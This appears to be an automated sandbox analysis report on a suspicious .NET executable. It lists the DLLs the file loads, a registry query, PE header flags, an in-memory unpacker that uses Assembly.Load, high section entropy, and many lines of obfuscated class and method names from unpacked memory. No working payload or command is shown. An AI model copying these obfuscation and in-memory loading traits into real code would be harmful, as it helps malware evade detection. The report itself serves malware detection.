Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: UzQWEAhf9B.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: UzQWEAhf9B.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: UzQWEAhf9B.exe, StatGrapher.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.UzQWEAhf9B.exe.2f029a8.0.raw.unpack, bg.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, RsNVEppXx0SfYIPCZ4.cs	.Net Code: yywsJDPwpI System.Reflection.Assembly.Load(byte[])
Source: 0.2.UzQWEAhf9B.exe.56d0000.5.raw.unpack, bg.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, RsNVEppXx0SfYIPCZ4.cs	.Net Code: yywsJDPwpI System.Reflection.Assembly.Load(byte[])
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, RsNVEppXx0SfYIPCZ4.cs	.Net Code: yywsJDPwpI System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 0_2_02D36750 push esp; iretd	0_2_02D36751
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_07C97520 pushfd ; ret	4_2_07C97591
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Code function: 4_2_0827E680 push esp; ret	4_2_0827E681

Source: UzQWEAhf9B.exe

Static PE information: section name: .text entropy: 7.926016195816783

Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, Ld7pC39ZWEXQsmVLLW.cs	High entropy of concatenated method names: 'sSqGHndFpi', 'hNdG4MWUtm', 'Y4qGdifHjQ', 'U0YGoxGU2t', 'uBqGfVxBLp', 'CBIGeidtHE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, rexMMaH8oMZaoDqW0Z.cs	High entropy of concatenated method names: 'z2P5tR7pak', 'k1W5Q8HTHI', 'vYh535Phpu', 'jEg5j8H9JI', 'og35pmdwAE', 'jij3KSEvP2', 'rim3X3elYW', 'k053BBby6m', 'FZh3inrXF0', 'IuS39luS2R'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, rL4c9LWPjCcqw0f5mcB.cs	High entropy of concatenated method names: 'okgOToXaqk', 'MGvOAvPsfw', 'WToOJnVbqH', 'udfO8q5Rq5', 'PpQOmsbesE', 'jCiOqnfGJ7', 'w34OugmoLp', 'l0HOkK9ndb', 'AOTOFJOrSx', 'a7LOZyAvsS'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, Wmo0jxgVx7tFLfs3Ed.cs	High entropy of concatenated method names: 'ToString', 'l6uLEVCtS6', 'CulL4Y4MaB', 'x68LdmpvEd', 'es0LohMXck', 'sKFLeVfiUU', 'yQYLlUZAWL', 'j4TLvDYovw', 'Jf7LMCP8Rm', 'oUKLw8pq0d'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, i70btBh2UIyncg4CiH.cs	High entropy of concatenated method names: 'mKGUIbQUey', 'cQUUyRYF3Y', 'ToString', 'UtJU1bpcaM', 'O9tUQrqvnd', 'KhfU0XS1hh', 'zYSU3NSFOr', 'yyaU5KBorK', 'kZNUjhRq1c', 'kLwUp52QLX'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, GE73y2XGp7byPFmlHH.cs	High entropy of concatenated method names: 'xGdUiQV417', 'MFTUcK5TLM', 'z96GPsh1ZS', 'sokGWLDmfJ', 'xcYUERMQfa', 'z9sU6xpHMb', 'hJRUCt8Mlf', 'IKTUflj7fx', 'phZUNgPrgo', 'lHRUgN2Oyy'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, NqsHWGwKer8YKRIdg1.cs	High entropy of concatenated method names: 'aN2jT6oMQc', 'nSljA636nq', 'PoXjJS5ybo', 'aU1j8gCD88', 'NahjmLMYWZ', 'YA4jq5ThR5', 'U96ju1we4S', 'h54jkDZDq3', 'bnGjFo8tOb', 'nuMjZDBURt'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, Xi8qoc0f0QE8UNRt1Z.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'R0PD9ZvxM4', 'ImfDcpVx6P', 'j5JDz87Us2', 'H6L7PsjQgm', 'ClF7WVDSF6', 'yNA7DOUUB8', 'pX777BvG2Q', 'nDpU0WtOTZXajh9QhoG'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, lm3ZMJfulnrjqrFC5J.cs	High entropy of concatenated method names: 'NpXRn1MObc', 'fPRR6lRTZS', 'C2SRfnnhIS', 'CMnRN7lkBL', 'sQKR4ZxFl5', 'o3wRd39fZ1', 'V4NRovRdrF', 'z5hReaKM1y', 'MH4Rlwkyi9', 'ptrRvuANqW'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, iwkqQhFPucOfadISxZ.cs	High entropy of concatenated method names: 'Oav08IerRf', 'C0h0qAeZhN', 'hb40k78tc3', 'V5o0FoA6D6', 'K5M0RdhW7t', 'kbB0LyMtX6', 'Cch0UHDK0P', 'Dv30GpT61r', 'naT0OIWAvr', 'G2A0xCbNna'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, RsNVEppXx0SfYIPCZ4.cs	High entropy of concatenated method names: 'F4f7t0todq', 'FBe71T0tnb', 'dpx7QsAg2Z', 'EcW70RoR1w', 'zn973F7RMG', 'Gqi75t1dK9', 'YI27j9mlr5', 'CuY7pQhVG4', 'EH17bieEju', 'BFX7Iid9wU'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, rxf6okDjtPSbXWEnLF.cs	High entropy of concatenated method names: 'EbXJUsYSE', 'wFf8ZS7LT', 'xQ1qrambr', 'hIMuuJplZ', 'vaeFenOaV', 'GhmZdnJmP', 'l3owdoTdxRHSk7I0Yo', 'Wor7Ma68vLA1d32Hrb', 'AgGGhG36J', 'jy4xoIZQp'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, ybHctFcRfhCLnWNocd.cs	High entropy of concatenated method names: 'AixOWPRuOE', 'rP8O7ZZWRP', 'cf1OsNqEX2', 'gcSO1ZZE0A', 'eXBOQ5XKaN', 'IdhO3TT1Lp', 'MacO5PWUZZ', 'IfZGBYJ5WH', 'JiOGiTdtyW', 'VEWG9oE4ZV'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, QRC0Eokay1sBk15lnl.cs	High entropy of concatenated method names: 'YbeQfW0kVo', 'Yu7QNiYCE6', 'JxAQgsV8oG', 'YRbQhFu0Ov', 'xWlQKL0E24', 'PIeQXgsWV1', 'CcGQBecN99', 'njEQiKLbJJ', 'pxoQ9EPbMx', 'h4LQc9yT3d'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, pC0eC8W7VpoFwcdtjNV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Wh4xfHW4iX', 'NvpxNK3OZx', 'Om9xgGcNPJ', 'tuBxhVV69T', 'SR8xKovHP3', 'GquxXvIkwb', 'Cc0xBILrPp'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, icddYlCgBCTaRZdds7.cs	High entropy of concatenated method names: 'DuCSk75LVd', 'r0ZSFtsZJe', 'QV2SHQP1ws', 'F0vS4d3j9T', 'Un9Soi3lgT', 'LGkSegmaSN', 's2pSvsCk8I', 'PRpSM74FFL', 'b3tSnhHO73', 'et7SElQoyF'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, Pmj5QPs4hPDHULbXm1.cs	High entropy of concatenated method names: 'G9fWjRC0Eo', 'uy1WpsBk15', 'TPuWIcOfad', 'lSxWyZY7VQ', 'F2bWR6KOex', 'MMaWL8oMZa', 'Haf8RTcOIZ2rqNwN2d', 'JsqCUFIa8qmbm1kVBV', 'brUWWZNsmQ', 'jYhW76Tof0'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, kfJYwZixqRGJ0mnhc1.cs	High entropy of concatenated method names: 'u3EG1ovsga', 'syvGQFJmjN', 'P1RG0JOZ58', 'HdfG3lHjWD', 'HV1G5B5qlC', 'YUEGjhHTcC', 's8eGp30xw4', 'htBGbnqF5w', 'QLgGIonAm7', 'UXQGyD9pmL'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, v7VQnYZ1ZbVkAZ2b6K.cs	High entropy of concatenated method names: 'WHw3mIAdZs', 'dWU3uAJBNY', 'UCi0dXoo71', 'GyQ0oV2sNp', 'nHb0eF3LPA', 'bYy0l7ppDR', 'mdI0vai11k', 'WHP0MUBYMf', 'p8L0whWbbk', 'ECg0nelgMr'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, Tdd4ecvu2YPG0uOu1f.cs	High entropy of concatenated method names: 'OrPj13M5Vs', 'Ifrj0qOayU', 'kMGj5xUxxK', 'Hap5cpMCvK', 'F6y5ztU7qA', 'RXHjP08R7n', 'OwijWKG0vi', 'IlRjDn6FR5', 't1sj7eVC2b', 'c1qjsOgmAo'
Source: 0.2.UzQWEAhf9B.exe.41202f8.4.raw.unpack, ako8slQanmdon2FZ0T.cs	High entropy of concatenated method names: 'Dispose', 'hRLW9AowQb', 'aRjD4lHKGA', 'B9DcclF0nl', 'dpfWcJYwZx', 'BRGWzJ0mnh', 'ProcessDialogKey', 'Y1MDPd7pC3', 'FWEDWXQsmV', 'pLWDDAbHct'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, Ld7pC39ZWEXQsmVLLW.cs	High entropy of concatenated method names: 'sSqGHndFpi', 'hNdG4MWUtm', 'Y4qGdifHjQ', 'U0YGoxGU2t', 'uBqGfVxBLp', 'CBIGeidtHE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, rexMMaH8oMZaoDqW0Z.cs	High entropy of concatenated method names: 'z2P5tR7pak', 'k1W5Q8HTHI', 'vYh535Phpu', 'jEg5j8H9JI', 'og35pmdwAE', 'jij3KSEvP2', 'rim3X3elYW', 'k053BBby6m', 'FZh3inrXF0', 'IuS39luS2R'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, rL4c9LWPjCcqw0f5mcB.cs	High entropy of concatenated method names: 'okgOToXaqk', 'MGvOAvPsfw', 'WToOJnVbqH', 'udfO8q5Rq5', 'PpQOmsbesE', 'jCiOqnfGJ7', 'w34OugmoLp', 'l0HOkK9ndb', 'AOTOFJOrSx', 'a7LOZyAvsS'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, Wmo0jxgVx7tFLfs3Ed.cs	High entropy of concatenated method names: 'ToString', 'l6uLEVCtS6', 'CulL4Y4MaB', 'x68LdmpvEd', 'es0LohMXck', 'sKFLeVfiUU', 'yQYLlUZAWL', 'j4TLvDYovw', 'Jf7LMCP8Rm', 'oUKLw8pq0d'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, i70btBh2UIyncg4CiH.cs	High entropy of concatenated method names: 'mKGUIbQUey', 'cQUUyRYF3Y', 'ToString', 'UtJU1bpcaM', 'O9tUQrqvnd', 'KhfU0XS1hh', 'zYSU3NSFOr', 'yyaU5KBorK', 'kZNUjhRq1c', 'kLwUp52QLX'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, GE73y2XGp7byPFmlHH.cs	High entropy of concatenated method names: 'xGdUiQV417', 'MFTUcK5TLM', 'z96GPsh1ZS', 'sokGWLDmfJ', 'xcYUERMQfa', 'z9sU6xpHMb', 'hJRUCt8Mlf', 'IKTUflj7fx', 'phZUNgPrgo', 'lHRUgN2Oyy'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, NqsHWGwKer8YKRIdg1.cs	High entropy of concatenated method names: 'aN2jT6oMQc', 'nSljA636nq', 'PoXjJS5ybo', 'aU1j8gCD88', 'NahjmLMYWZ', 'YA4jq5ThR5', 'U96ju1we4S', 'h54jkDZDq3', 'bnGjFo8tOb', 'nuMjZDBURt'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, Xi8qoc0f0QE8UNRt1Z.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'R0PD9ZvxM4', 'ImfDcpVx6P', 'j5JDz87Us2', 'H6L7PsjQgm', 'ClF7WVDSF6', 'yNA7DOUUB8', 'pX777BvG2Q', 'nDpU0WtOTZXajh9QhoG'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, lm3ZMJfulnrjqrFC5J.cs	High entropy of concatenated method names: 'NpXRn1MObc', 'fPRR6lRTZS', 'C2SRfnnhIS', 'CMnRN7lkBL', 'sQKR4ZxFl5', 'o3wRd39fZ1', 'V4NRovRdrF', 'z5hReaKM1y', 'MH4Rlwkyi9', 'ptrRvuANqW'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, iwkqQhFPucOfadISxZ.cs	High entropy of concatenated method names: 'Oav08IerRf', 'C0h0qAeZhN', 'hb40k78tc3', 'V5o0FoA6D6', 'K5M0RdhW7t', 'kbB0LyMtX6', 'Cch0UHDK0P', 'Dv30GpT61r', 'naT0OIWAvr', 'G2A0xCbNna'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, RsNVEppXx0SfYIPCZ4.cs	High entropy of concatenated method names: 'F4f7t0todq', 'FBe71T0tnb', 'dpx7QsAg2Z', 'EcW70RoR1w', 'zn973F7RMG', 'Gqi75t1dK9', 'YI27j9mlr5', 'CuY7pQhVG4', 'EH17bieEju', 'BFX7Iid9wU'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, rxf6okDjtPSbXWEnLF.cs	High entropy of concatenated method names: 'EbXJUsYSE', 'wFf8ZS7LT', 'xQ1qrambr', 'hIMuuJplZ', 'vaeFenOaV', 'GhmZdnJmP', 'l3owdoTdxRHSk7I0Yo', 'Wor7Ma68vLA1d32Hrb', 'AgGGhG36J', 'jy4xoIZQp'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, ybHctFcRfhCLnWNocd.cs	High entropy of concatenated method names: 'AixOWPRuOE', 'rP8O7ZZWRP', 'cf1OsNqEX2', 'gcSO1ZZE0A', 'eXBOQ5XKaN', 'IdhO3TT1Lp', 'MacO5PWUZZ', 'IfZGBYJ5WH', 'JiOGiTdtyW', 'VEWG9oE4ZV'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, QRC0Eokay1sBk15lnl.cs	High entropy of concatenated method names: 'YbeQfW0kVo', 'Yu7QNiYCE6', 'JxAQgsV8oG', 'YRbQhFu0Ov', 'xWlQKL0E24', 'PIeQXgsWV1', 'CcGQBecN99', 'njEQiKLbJJ', 'pxoQ9EPbMx', 'h4LQc9yT3d'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, pC0eC8W7VpoFwcdtjNV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Wh4xfHW4iX', 'NvpxNK3OZx', 'Om9xgGcNPJ', 'tuBxhVV69T', 'SR8xKovHP3', 'GquxXvIkwb', 'Cc0xBILrPp'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, icddYlCgBCTaRZdds7.cs	High entropy of concatenated method names: 'DuCSk75LVd', 'r0ZSFtsZJe', 'QV2SHQP1ws', 'F0vS4d3j9T', 'Un9Soi3lgT', 'LGkSegmaSN', 's2pSvsCk8I', 'PRpSM74FFL', 'b3tSnhHO73', 'et7SElQoyF'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, Pmj5QPs4hPDHULbXm1.cs	High entropy of concatenated method names: 'G9fWjRC0Eo', 'uy1WpsBk15', 'TPuWIcOfad', 'lSxWyZY7VQ', 'F2bWR6KOex', 'MMaWL8oMZa', 'Haf8RTcOIZ2rqNwN2d', 'JsqCUFIa8qmbm1kVBV', 'brUWWZNsmQ', 'jYhW76Tof0'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, kfJYwZixqRGJ0mnhc1.cs	High entropy of concatenated method names: 'u3EG1ovsga', 'syvGQFJmjN', 'P1RG0JOZ58', 'HdfG3lHjWD', 'HV1G5B5qlC', 'YUEGjhHTcC', 's8eGp30xw4', 'htBGbnqF5w', 'QLgGIonAm7', 'UXQGyD9pmL'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, v7VQnYZ1ZbVkAZ2b6K.cs	High entropy of concatenated method names: 'WHw3mIAdZs', 'dWU3uAJBNY', 'UCi0dXoo71', 'GyQ0oV2sNp', 'nHb0eF3LPA', 'bYy0l7ppDR', 'mdI0vai11k', 'WHP0MUBYMf', 'p8L0whWbbk', 'ECg0nelgMr'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, Tdd4ecvu2YPG0uOu1f.cs	High entropy of concatenated method names: 'OrPj13M5Vs', 'Ifrj0qOayU', 'kMGj5xUxxK', 'Hap5cpMCvK', 'F6y5ztU7qA', 'RXHjP08R7n', 'OwijWKG0vi', 'IlRjDn6FR5', 't1sj7eVC2b', 'c1qjsOgmAo'
Source: 0.2.UzQWEAhf9B.exe.58d0000.8.raw.unpack, ako8slQanmdon2FZ0T.cs	High entropy of concatenated method names: 'Dispose', 'hRLW9AowQb', 'aRjD4lHKGA', 'B9DcclF0nl', 'dpfWcJYwZx', 'BRGWzJ0mnh', 'ProcessDialogKey', 'Y1MDPd7pC3', 'FWEDWXQsmV', 'pLWDDAbHct'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, Ld7pC39ZWEXQsmVLLW.cs	High entropy of concatenated method names: 'sSqGHndFpi', 'hNdG4MWUtm', 'Y4qGdifHjQ', 'U0YGoxGU2t', 'uBqGfVxBLp', 'CBIGeidtHE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, rexMMaH8oMZaoDqW0Z.cs	High entropy of concatenated method names: 'z2P5tR7pak', 'k1W5Q8HTHI', 'vYh535Phpu', 'jEg5j8H9JI', 'og35pmdwAE', 'jij3KSEvP2', 'rim3X3elYW', 'k053BBby6m', 'FZh3inrXF0', 'IuS39luS2R'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, rL4c9LWPjCcqw0f5mcB.cs	High entropy of concatenated method names: 'okgOToXaqk', 'MGvOAvPsfw', 'WToOJnVbqH', 'udfO8q5Rq5', 'PpQOmsbesE', 'jCiOqnfGJ7', 'w34OugmoLp', 'l0HOkK9ndb', 'AOTOFJOrSx', 'a7LOZyAvsS'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, Wmo0jxgVx7tFLfs3Ed.cs	High entropy of concatenated method names: 'ToString', 'l6uLEVCtS6', 'CulL4Y4MaB', 'x68LdmpvEd', 'es0LohMXck', 'sKFLeVfiUU', 'yQYLlUZAWL', 'j4TLvDYovw', 'Jf7LMCP8Rm', 'oUKLw8pq0d'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, i70btBh2UIyncg4CiH.cs	High entropy of concatenated method names: 'mKGUIbQUey', 'cQUUyRYF3Y', 'ToString', 'UtJU1bpcaM', 'O9tUQrqvnd', 'KhfU0XS1hh', 'zYSU3NSFOr', 'yyaU5KBorK', 'kZNUjhRq1c', 'kLwUp52QLX'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, GE73y2XGp7byPFmlHH.cs	High entropy of concatenated method names: 'xGdUiQV417', 'MFTUcK5TLM', 'z96GPsh1ZS', 'sokGWLDmfJ', 'xcYUERMQfa', 'z9sU6xpHMb', 'hJRUCt8Mlf', 'IKTUflj7fx', 'phZUNgPrgo', 'lHRUgN2Oyy'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, NqsHWGwKer8YKRIdg1.cs	High entropy of concatenated method names: 'aN2jT6oMQc', 'nSljA636nq', 'PoXjJS5ybo', 'aU1j8gCD88', 'NahjmLMYWZ', 'YA4jq5ThR5', 'U96ju1we4S', 'h54jkDZDq3', 'bnGjFo8tOb', 'nuMjZDBURt'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, Xi8qoc0f0QE8UNRt1Z.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'R0PD9ZvxM4', 'ImfDcpVx6P', 'j5JDz87Us2', 'H6L7PsjQgm', 'ClF7WVDSF6', 'yNA7DOUUB8', 'pX777BvG2Q', 'nDpU0WtOTZXajh9QhoG'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, lm3ZMJfulnrjqrFC5J.cs	High entropy of concatenated method names: 'NpXRn1MObc', 'fPRR6lRTZS', 'C2SRfnnhIS', 'CMnRN7lkBL', 'sQKR4ZxFl5', 'o3wRd39fZ1', 'V4NRovRdrF', 'z5hReaKM1y', 'MH4Rlwkyi9', 'ptrRvuANqW'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, iwkqQhFPucOfadISxZ.cs	High entropy of concatenated method names: 'Oav08IerRf', 'C0h0qAeZhN', 'hb40k78tc3', 'V5o0FoA6D6', 'K5M0RdhW7t', 'kbB0LyMtX6', 'Cch0UHDK0P', 'Dv30GpT61r', 'naT0OIWAvr', 'G2A0xCbNna'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, RsNVEppXx0SfYIPCZ4.cs	High entropy of concatenated method names: 'F4f7t0todq', 'FBe71T0tnb', 'dpx7QsAg2Z', 'EcW70RoR1w', 'zn973F7RMG', 'Gqi75t1dK9', 'YI27j9mlr5', 'CuY7pQhVG4', 'EH17bieEju', 'BFX7Iid9wU'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, rxf6okDjtPSbXWEnLF.cs	High entropy of concatenated method names: 'EbXJUsYSE', 'wFf8ZS7LT', 'xQ1qrambr', 'hIMuuJplZ', 'vaeFenOaV', 'GhmZdnJmP', 'l3owdoTdxRHSk7I0Yo', 'Wor7Ma68vLA1d32Hrb', 'AgGGhG36J', 'jy4xoIZQp'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, ybHctFcRfhCLnWNocd.cs	High entropy of concatenated method names: 'AixOWPRuOE', 'rP8O7ZZWRP', 'cf1OsNqEX2', 'gcSO1ZZE0A', 'eXBOQ5XKaN', 'IdhO3TT1Lp', 'MacO5PWUZZ', 'IfZGBYJ5WH', 'JiOGiTdtyW', 'VEWG9oE4ZV'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, QRC0Eokay1sBk15lnl.cs	High entropy of concatenated method names: 'YbeQfW0kVo', 'Yu7QNiYCE6', 'JxAQgsV8oG', 'YRbQhFu0Ov', 'xWlQKL0E24', 'PIeQXgsWV1', 'CcGQBecN99', 'njEQiKLbJJ', 'pxoQ9EPbMx', 'h4LQc9yT3d'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, pC0eC8W7VpoFwcdtjNV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Wh4xfHW4iX', 'NvpxNK3OZx', 'Om9xgGcNPJ', 'tuBxhVV69T', 'SR8xKovHP3', 'GquxXvIkwb', 'Cc0xBILrPp'
